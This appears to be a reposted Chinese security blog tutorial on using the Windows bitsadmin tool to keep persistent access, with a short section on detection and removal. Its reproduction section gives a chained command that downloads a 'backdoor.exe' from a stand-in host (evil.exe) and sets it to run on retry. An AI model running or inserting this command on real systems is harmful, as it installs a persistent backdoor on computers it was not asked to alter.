【权限维持技术】Windows Bitsadmin命令

admin 2024年2月15日14:34:28评论10 views字数 916阅读3分3秒阅读模式
【权限维持技术】Windows Bitsadmin命令

免责声明

【权限维持技术】Windows Bitsadmin命令

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。

【权限维持技术】Windows Bitsadmin命令

Bitsadmin

【权限维持技术】Windows Bitsadmin命令
Bitsadmin是Windows操作系统中的一个命令行工具,用于创建下载或上传作业并监控它们的进度。一个作业可以包含多个文件。
Bitsadmin 是使用后台智能传输服务(BITS)的方式进行的,因此即使链接临时中断,文件传输也不会失败。

【权限维持技术】Windows Bitsadmin命令

bitsadmin工具用法示例:
bitsadmin /create myDownloadJob bitsadmin /addfile myDownloadJob https://example.com/file.zip C:pathtofile.zip bitsadmin /resume myDownloadJob
上述示例会创建一个名为“myDownloadJob”的下载作业,将一个文件从指定的URL下载到本地指定路径,然后开始该作业。
【权限维持技术】Windows Bitsadmin命令

复现

【权限维持技术】Windows Bitsadmin命令
  1.  Bitsadmin可以允许用户执行cmd命令,因此可以利用这个特性来进行权限维持

  2. 首先构建好我们的Bitsadmin命令:

bitsadmin /create backdoorbitsadmin /addfile backdoor "http://evil.exe/backdoor.exe"  "C:1.exe"bitsadmin /SetNotifyCmdLine backdoor C:1.exe NULbitsadmin /SetMinRetryDelay "backdoor" 60 bitsadmin /resume backdoor

3. 这一段命令的含义为:

    • 创建作业,名为backdoor
    • 使用addfile将文件保存本地
    • 使用SetNotifyCmdLine设定将执行的命令
    • 使用SetMinRetryDelay定义时间回调(秒)
    • 开始工作
4. 执行后即可等待上线
【权限维持技术】Windows Bitsadmin命令

防范

【权限维持技术】Windows Bitsadmin命令
  1. 建议直接删除该工具,因为绝大部分情况下不需要

  2. 这种方法可以绕过目前所有启动项检查工具,需要通过bistamin命令检测:

    bitsadmin /list /allusers /verbose

原文始发于微信公众号(赛博安全狗):【权限维持技术】Windows Bitsadmin命令

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日14:34:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【权限维持技术】Windows Bitsadmin命令https://cn-sec.com/archives/2193893.html

发表评论

匿名网友 填写信息